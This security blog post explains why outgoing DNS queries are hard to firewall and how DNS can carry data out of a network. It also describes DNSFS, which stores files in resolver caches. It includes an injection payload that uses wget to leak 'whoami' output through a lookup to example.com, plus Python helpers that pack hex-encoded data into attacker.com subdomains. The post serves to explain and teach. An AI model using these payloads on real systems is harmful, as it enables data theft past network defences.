DNSFS: Is it possible to use DNS as a file system?

This blog post discusses the security shortcomings of DNS requests, whether they can be blocked using a firewall, and how they compare with HTTP. It also examines a DNS-based file system proposed by Ben Cox designed to store files in the caches of DNS resolvers.

In the world of information security and privacy, Domain Name System (DNS) requests present a special problem. Not only are they unencrypted by default, making it easy for anyone to intercept and modify them, but attackers have also used them to amplify Distributed Denial of Service (DDoS) attacks.

Attackers can do this because DNS uses the User Datagram Protocol (UDP) for messages of up to 4096 bytes (a common limit when the EDNS0 extension is in use), and the lack of TCP's three-way handshake makes it easy to spoof the source IP address. This means that attackers can send relatively small requests to the DNS server, which in turn sends much bigger responses to the spoofed IP address. But this is not the only headache with DNS.

Can't you simply block outgoing DNS requests?

If you are serious about online security, you need a robust firewall that blocks unneeded incoming and outgoing requests. For example, if you are running a website on a VPN, there is no need to expose its Secure Shell (SSH) service to everyone who connects to it.

In addition, if your application doesn't need to send outgoing HTTP requests to other servers, it's good practice to block those too. In production, any negative side effects of these restrictions will be almost imperceptible.

However, blocking outgoing DNS requests is a totally different matter. Everything sends DNS queries, from system and application updates to your backup system and your web and proxy servers. It is not always possible to whitelist these outgoing requests, so outgoing DNS queries are often not restricted by the firewall.

Exfiltrating data over DNS



All this explains why penetration testers, and malicious hackers, love to resort to the DNS protocol for data exfiltration. Let's say there is a command injection vulnerability in a web application, but outgoing HTTP requests are blocked. A payload that exfiltrates the data might look like this:

    ;wget `whoami`.example.com

First, `whoami` will be expanded to the name of the current user. In the case of Apache web servers, this user is most likely www-data. The command will look like this after it's expanded:

    ;wget www-data.example.com

wget will send a DNS request asking for the IP address of the subdomain www-data on example.com, and example.com's nameserver will log that request. Even though the subsequent HTTP request may fail, the attacker is still able to extract the data over DNS. However, this is not an ideal way to exfiltrate data. While there are hardly any restrictions on the amount of data an HTTP POST request can carry, extracting data over DNS is much more complicated.
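On the receiving side, recovering the value is mostly a matter of stripping the attacker's zone from the logged query name. The following is a minimal sketch, assuming the nameserver log yields the queried name as a plain string; the function name `extract_leaked_value` is hypothetical and not part of any real tool.

```python
from typing import Optional


def extract_leaked_value(query_name: str, zone: str = "example.com") -> Optional[str]:
    """Return the part of a logged query name that precedes the zone.

    Returns None when the name is outside the zone or has no extra labels.
    """
    # DNS names are case-insensitive and may be logged with a trailing dot.
    # Note that lowercasing also lowercases the leaked value itself.
    name = query_name.rstrip(".").lower()
    suffix = "." + zone.rstrip(".").lower()
    if not name.endswith(suffix):
        return None
    leaked = name[: -len(suffix)]
    return leaked or None


print(extract_leaked_value("www-data.example.com."))
```

Because the lookup happens before wget attempts the HTTP connection, the value reaches the log even when the firewall drops the HTTP request.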

Should we use DNS or HTTP for data extraction?

The reason why you should never prefer data extraction via DNS, when you can use HTTP, is simple. In DNS requests, Fully Qualified Domain Names (FQDNs) are limited to 253 characters, not all of which can be used for data exfiltration.



Let's say you own the domain attacker.com. This already consists of twelve characters. Then you need to add a dot to separate the subdomains, which is another extra character. After that you can send the actual data, but because you need to avoid most special characters, you need to use encoding. Let's say you use hex encoding. This means the size of the data you want to exfiltrate effectively doubles. The parts of the FQDN that are separated by dots are called labels, and each of them must be no longer than 63 characters, containing only letters, digits and hyphens.
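To make the encoding step concrete, here is a minimal sketch of how data could be hex-encoded and packed into labels in front of attacker.com. The function names `build_exfil_name` and `decode_exfil_name` are hypothetical, and the code only illustrates the length rules described above rather than any particular tool.

```python
MAX_LABEL_LEN = 63   # maximum length of a single label
MAX_FQDN_LEN = 253   # maximum length of the whole name


def build_exfil_name(data: bytes, domain: str = "attacker.com") -> str:
    """Hex-encode data and pack it into labels in front of domain."""
    encoded = data.hex()  # two hex characters per byte
    # Cut the hex string into labels of at most 63 characters.
    labels = [
        encoded[i : i + MAX_LABEL_LEN]
        for i in range(0, len(encoded), MAX_LABEL_LEN)
    ]
    fqdn = ".".join(labels + [domain])
    if not data or len(fqdn) > MAX_FQDN_LEN:
        raise ValueError("data is empty or does not fit into a single FQDN")
    return fqdn


def decode_exfil_name(fqdn: str, domain: str = "attacker.com") -> bytes:
    """Reverse build_exfil_name: drop the domain, join the labels, decode hex."""
    payload = fqdn[: -len("." + domain)]
    return bytes.fromhex(payload.replace(".", ""))


name = build_exfil_name(b"www-data")
print(name)
print(decode_exfil_name(name))
```

Hex output contains only digits and the letters a to f, so every label automatically satisfies the letters, digits and hyphens rule.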

So .attacker.com is 13 characters long. Let's see how many characters we can extract.

Let's ignore the attacker.com domain name and all the separating dots. What we are left with is 48 + (3 * 63), or in other words 237 characters. With hex encoding, every byte takes two characters, so we need an even number of characters, which leaves 236 characters for extraction (if we don't want to split one encoded byte across two different messages). However, the actual number of bytes is exactly half of that after decoding, so we can extract 118 bytes per request. This means that we need at least 8,475 requests per megabyte (1,000,000 bytes) of data.
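The calculation above can be reproduced in a few lines. This is only a sketch of the arithmetic; the constant names are illustrative, and a megabyte is taken to be 1,000,000 bytes.

```python
import math

MAX_FQDN_LEN = 253
MAX_LABEL_LEN = 63
DOMAIN_SUFFIX = ".attacker.com"  # 13 characters, including the leading dot

# Characters left in front of the domain suffix.
available = MAX_FQDN_LEN - len(DOMAIN_SUFFIX)

# n labels need n - 1 separating dots; find the smallest n whose labels
# (at most 63 characters each) can hold the remaining characters.
num_labels = math.ceil((available + 1) / (MAX_LABEL_LEN + 1))
data_chars = available - (num_labels - 1)

# Hex encoding uses two characters per byte, so round down to an even number.
hex_chars = data_chars - data_chars % 2
bytes_per_request = hex_chars // 2

requests_per_megabyte = math.ceil(1_000_000 / bytes_per_request)

print(data_chars, hex_chars, bytes_per_request, requests_per_megabyte)
```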

What comes to mind when you read how incredibly inconvenient it is to send large amounts of data using DNS requests? Of course! Storing files in DNS server caches! Confused? Let me explain...

Is DNSFS really a DNS-based file system?

A while ago, Ben Cox was testing how long some DNS resolvers actually keep DNS records in their cache. It turned out that some of them were storing the data for up to one week. Ever since he wrote a blog post about his findings, he had been curious about whether he could use this behaviour to store files in the caches of DNS resolvers.

- He first had to scan the internet for open DNS resolvers. When he was finished, he had amassed quite a large list. After waiting for ten days, in order to weed out the resolvers running on dynamic IP addresses, he was still left with many open resolvers.

- He then wrote DNSFS (DNS File System), a tool that allows him to store files in DNS records. This is how it works. Let's assume he owns the hostname dnsfs.ns on which he runs the DNSFS tool. If he wants to store the file names.txt, he can use an open resolver to query some-subdomain.dnsfs.ns. The DNSFS tool will then in turn return a base64-encoded version of the file in a TXT record, with the TTL set to 68 years. After that, the file is deleted from the DNSFS memory.

- The user can now use DNSFS to query the resolver again and retrieve the file from the cached TXT record. However, if the user wants to store a larger file, it is split into parts of 180 bytes each, and the parts are stored in different TXT records.
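The splitting and encoding steps described above can be sketched as follows. This is not Ben Cox's implementation: the function names and the record naming scheme (`<part index>.<file id>.dnsfs.ns`) are assumptions made purely for illustration, and the sketch does not send any DNS traffic.

```python
import base64
from typing import Dict

CHUNK_SIZE = 180      # bytes per part, as described above
MAX_TTL = 2**31 - 1   # largest TTL value in seconds, roughly 68 years


def file_to_txt_records(data: bytes, file_id: str, zone: str = "dnsfs.ns") -> Dict[str, str]:
    """Map hypothetical record names to base64-encoded 180-byte parts."""
    records = {}
    for index, offset in enumerate(range(0, len(data), CHUNK_SIZE)):
        chunk = data[offset : offset + CHUNK_SIZE]
        # Hypothetical naming scheme: <part index>.<file id>.<zone>
        name = f"{index}.{file_id}.{zone}"
        records[name] = base64.b64encode(chunk).decode("ascii")
    return records


def txt_records_to_file(records: Dict[str, str]) -> bytes:
    """Reassemble the file by decoding the parts in index order."""
    ordered = sorted(records.items(), key=lambda item: int(item[0].split(".", 1)[0]))
    return b"".join(base64.b64decode(value) for _, value in ordered)


original = bytes(range(256)) * 2  # 512 bytes of sample data
records = file_to_txt_records(original, "names-txt")
print(len(records), "records, TTL of about", MAX_TTL // (365 * 24 * 3600), "years")
```

A 180-byte part becomes 240 base64 characters, which fits within the 255-byte limit of a single TXT character-string.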

If you're wondering whether this actually works, check out his blog post (linked above), where you can see the tool in action. He was able to use this technique to store one of his previous blog posts on different DNS servers. But, as tempting as it sounds, please don't store your tax records on open DNS resolvers, as this storage method is highly unreliable!

Article written by Netsparker security researchers:

Ziyahan Albeniz

Sven Morgenroth